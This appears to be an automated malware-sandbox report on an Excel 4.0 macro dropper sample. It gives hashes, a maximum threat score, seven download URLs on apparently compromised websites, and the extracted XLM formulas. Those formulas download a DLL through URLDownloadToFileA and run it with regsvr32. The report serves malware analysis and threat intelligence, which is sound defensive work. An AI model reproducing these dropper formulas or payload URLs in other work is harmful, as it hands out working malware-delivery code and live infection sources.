Overview

overview

10

Static

static

10

c5e91b6702...a.xlsm

windows7-x64

10

c5e91b6702...a.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    c5e91b67025af43532ffbc06cf7009684f0c632e61d1b41a022c6de9243b8c9a

  • Size

    20KB

  • Sample

    241120-rkrqrayclr

  • MD5

    3cf35d21c013505c2af4e059eff8b552

  • SHA1

    c1b2af94d52f68da802dbba83f0820da05110fd6

  • SHA256

    c5e91b67025af43532ffbc06cf7009684f0c632e61d1b41a022c6de9243b8c9a

  • SHA512

    dc82ea8c6411a5fecf1fad1ff1d6e563f87e7ca875bea10cd55335a077ffa6f1dfe1e2afc9b9352e45d327bb2255e6fb268b3dc0b84aff414ca7b8b5e1a0b3c3

  • SSDEEP

    384:eJaVb1GNjImo4CGzPd6ZIwwSKb5CzgObff9kC+xbX7Fg7a:kiIN3o4FLTCBn9kC+xbLF1

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://banrai.ac.th/website/IHI0iNLLWDh9P/

http://bangsoe.dk/__backup/JON6L/

http://bahr.se/tvillingar2-filer/0wFIrmZ70Vl/

https://barkstage.es/wp-content/S0Q/

https://aquinoabogados.com.ar/newsletter/Zm7prnrQ55D1hrHqDC/

http://ceibadiseno.com.mx/bandermex2/6a6wGJmNwx8/

https://www.manchesterot.co.uk/about-us/LFXAJJIa/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://banrai.ac.th/website/IHI0iNLLWDh9P/","..\kytk.dll",0,0) =IF('SCWVCV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bangsoe.dk/__backup/JON6L/","..\kytk.dll",0,0)) =IF('SCWVCV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bahr.se/tvillingar2-filer/0wFIrmZ70Vl/","..\kytk.dll",0,0)) =IF('SCWVCV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://barkstage.es/wp-content/S0Q/","..\kytk.dll",0,0)) =IF('SCWVCV'!D20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://aquinoabogados.com.ar/newsletter/Zm7prnrQ55D1hrHqDC/","..\kytk.dll",0,0)) =IF('SCWVCV'!D22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ceibadiseno.com.mx/bandermex2/6a6wGJmNwx8/","..\kytk.dll",0,0)) =IF('SCWVCV'!D24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.manchesterot.co.uk/about-us/LFXAJJIa/","..\kytk.dll",0,0)) =IF('SCWVCV'!D26<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\kytk.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://banrai.ac.th/website/IHI0iNLLWDh9P/
xlm40.dropper

http://bangsoe.dk/__backup/JON6L/
xlm40.dropper

http://bahr.se/tvillingar2-filer/0wFIrmZ70Vl/
xlm40.dropper

https://barkstage.es/wp-content/S0Q/

Targets

    • Target

      c5e91b67025af43532ffbc06cf7009684f0c632e61d1b41a022c6de9243b8c9a

    • Size

      20KB

    • MD5

      3cf35d21c013505c2af4e059eff8b552

    • SHA1

      c1b2af94d52f68da802dbba83f0820da05110fd6

    • SHA256

      c5e91b67025af43532ffbc06cf7009684f0c632e61d1b41a022c6de9243b8c9a

    • SHA512

      dc82ea8c6411a5fecf1fad1ff1d6e563f87e7ca875bea10cd55335a077ffa6f1dfe1e2afc9b9352e45d327bb2255e6fb268b3dc0b84aff414ca7b8b5e1a0b3c3

    • SSDEEP

      384:eJaVb1GNjImo4CGzPd6ZIwwSKb5CzgObff9kC+xbX7Fg7a:kiIN3o4FLTCBn9kC+xbLF1

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks